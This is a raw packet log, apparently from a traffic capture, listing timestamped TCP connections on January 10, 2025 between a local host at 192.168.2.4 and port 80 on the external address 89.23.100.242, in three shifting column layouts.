Jan 10, 2025 07:57:55.042447090 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042474985 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042490005 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042503119 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042511940 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042529106 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042557955 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042573929 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042582035 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042608023 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042625904 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042634964 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042653084 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042663097 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042674065 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042689085 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042706013 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042773008 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042778969 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042805910 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042828083 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042830944 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042855024 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042857885 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042877913 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042885065 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042896986 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042936087 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042936087 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042964935 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042990923 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042990923 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043018103 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043062925 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043087959 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043114901 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043191910 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.043375969 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.047173977 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.047935963 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048028946 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048094988 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048125982 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048249006 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048326969 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048418045 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048475027 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048551083 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048604012 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048675060 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048705101 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048751116 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048777103 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048824072 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048850060 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048893929 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048919916 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048944950 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.048991919 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049017906 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049042940 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049067974 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049093962 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049139023 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049165010 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049190044 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049216032 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049241066 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.049267054 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.275729895 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.295809984 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.407684088 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.449727058 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.449810028 CET  49764        80         192.168.2.4    89.23.100.242
                                                                                                Jan 10, 2025 07:57:55.450304031 CET4976380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.455435991 CET804976389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.455498934 CET4976380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.577157974 CET4976480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.577485085 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582464933 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.582505941 CET804976489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.582525969 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582549095 CET4976480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582652092 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.587444067 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.939254045 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.944434881 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.944472075 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.944504976 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.344883919 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.478418112 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.478482008 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.591308117 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.591507912 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597021103 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.597037077 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.597090960 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597162008 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597197056 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.602164030 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.954626083 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.960830927 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.960851908 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.960864067 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.002363920 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.002748966 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.007304907 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.007386923 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.007466078 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.012345076 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.050102949 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.121304035 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.121356010 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.128453016 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.133375883 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.133443117 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.133534908 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.138328075 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.360899925 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.366110086 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.366156101 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.485857010 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.658756018 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.658806086 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.658837080 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.750890970 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.886811972 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.886897087 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.897707939 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.970182896 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.037674904 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.154133081 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.154301882 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.154648066 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159471035 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159524918 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159589052 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159622908 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159653902 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159732103 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159742117 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.164601088 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.517132998 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.522433996 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.522471905 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.522499084 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.919815063 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.970181942 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.070936918 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.173302889 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.183836937 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.184160948 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.188822985 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.188874960 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.189074039 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.189146996 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.189234972 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.193986893 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.548393965 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.553428888 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.553469896 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.553499937 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.954938889 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.098126888 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.098284006 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.104898930 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.104962111 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.105047941 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.105056047 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.105545998 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.111696005 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.454629898 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.459619999 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.459651947 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.459678888 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.838918924 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.953502893 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.968684912 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.092089891 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.092413902 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097362041 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.097397089 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.097425938 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097487926 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097579002 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.102359056 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.454739094 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.459753036 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.459836006 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.459863901 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.932148933 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.050705910 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.051042080 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056035042 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.056076050 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.056109905 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056140900 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056330919 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.061306953 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.407752037 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.412677050 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.412817001 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.412844896 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.803215027 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.920264006 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.922558069 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.925447941 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.925519943 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.925606012 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.927664042 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.927818060 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.930504084 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.234491110 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.239579916 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.242065907 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.244288921 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.249133110 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.282778978 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.287697077 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.287976027 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.595292091 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.600311995 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.600344896 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.600372076 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.786283016 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.901524067 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.003618956 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.110837936 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.195121050 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.309701920 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.317564011 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.317773104 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.318124056 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.322618008 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.322691917 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.322927952 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.323000908 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.323093891 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.323101044 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.323158026 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.327903986 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.673408985 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.678520918 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.678544998 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.678553104 CET804980889.23.100.242192.168.2.4
Jan 10, 2025 07:58:05.183228970 CET  80     49808  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.313972950 CET  49808  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.324965000 CET  80     49808  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.504681110 CET  49808  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.505093098 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.509773016 CET  80     49808  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.509984970 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.510055065 CET  49808  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.510072947 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.510200977 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.515023947 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.860974073 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:05.866076946 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.866112947 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:05.866142035 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.311803102 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.463865995 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.465204954 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.595204115 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.595366955 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.600199938 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.600318909 CET  80     49814  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.600398064 CET  49814  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.600399971 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.600534916 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.605277061 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.954659939 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:06.959712029 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.959727049 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:06.959738016 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.344628096 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.468744993 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.468977928 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.473887920 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.473918915 CET  80     49823  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.473968983 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.473983049 CET  49823  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.474140882 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.478998899 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.829819918 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:07.834872961 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.834908962 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:07.834937096 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.327179909 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.376661062 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.460572958 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.501569033 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.580286980 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.580576897 CET  49837  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.585429907 CET  80     49830  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.585500002 CET  49830  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.585552931 CET  80     49837  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.585624933 CET  49837  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.585736990 CET  49837  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.590580940 CET  80     49837  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.800123930 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.801567078 CET  49837  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.805007935 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.805102110 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.805211067 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.810050011 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.849956036 CET  80     49837  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.922875881 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.928033113 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:08.928163052 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.928224087 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:08.933059931 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.089014053 CET  80     49837  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.089088917 CET  49837  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.157881975 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.162780046 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.163021088 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.283199072 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.288080931 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.288177013 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.288206100 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.573379040 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.664468050 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.704595089 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.706527948 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.720182896 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.813954115 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.818079948 CET  80     49841  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.860812902 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.936229944 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.936278105 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.936530113 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.941339016 CET  80     49840  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.941396952 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:09.941418886 CET  49840  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.941459894 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.941536903 CET  80     49841  89.23.100.242  192.168.2.4
